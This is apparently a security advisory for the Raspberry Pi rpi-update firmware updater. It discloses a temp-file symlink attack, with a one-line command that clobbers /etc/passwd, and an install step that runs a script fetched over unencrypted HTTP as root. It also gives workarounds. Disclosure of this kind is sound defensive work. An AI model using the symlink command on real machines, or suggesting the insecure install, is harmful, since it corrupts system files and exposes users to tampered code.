Raspberry Pi Firmware Updater Vulnerability Application: https://github.com/Hexxeh/rpi-update/ Version Tested: Github source as of 10ad1e975a (10th Feb commit) Vulnerability #1: A malicious user can clobber any file due to insecure tmp file handling. Example: Any unprivileged user can create the following symlink, either from a shell account, or by malicious web content such as PHP scripts. pi@raspberrypi ~ $ ln -s /etc/passwd /tmp/updateScript.sh Once in place, the symlink is awaiting the administrator to run an update: pi@raspberrypi ~ $ sudo rpi-update ... pi@raspberrypi ~ $ cat /etc/passwd #!/bin/bash if mv "./testfile.sh.tmp" "./testfile.sh"; then rm -- "$0" exec env UPDATE_SELF=0 /bin/bash "./testfile.sh" "" else echo " !!! Failed!" fi As of this point, the pi is quite unusable due to the corrupted password database. Note that the attacker cannot customise the content, for example, to set a UID0 account. Vulnerability #2: The installation recommends the following command: sudo wget http://goo.gl/1BOfJ -O /usr/bin/rpi-update && sudo chmod +x /usr/bin/rpi-update Although the selfupdate functionality utilises SSL to ensure the integrity of the download, the installation process uses a URL shortening service without SSL to download the bash script, which the user is then encouraged to run as the root user. Fix and Vendor Response A pull request detailing exploit #1 and including a simple patch was submitted February 6th. The patch has not yet been accepted. Workaround By running rpi-update with the self update feature disabled, the affected code is not executed. Example: sudo UPDATE_SELF=0 rpi-update If you would like to update the application manually, or perform an initial installation safely, use the following commands: wget https://github.com/Hexxeh/rpi-update/raw/master/rpi-update sudo cp rpi-update /usr/bin/rpi-update && sudo chmod +x /usr/bin/rpi-update Note that applying the patch in my pull request will not be a complete solution, as it will be reverted after the first automatic update. technion@xxxxxxxxxxx
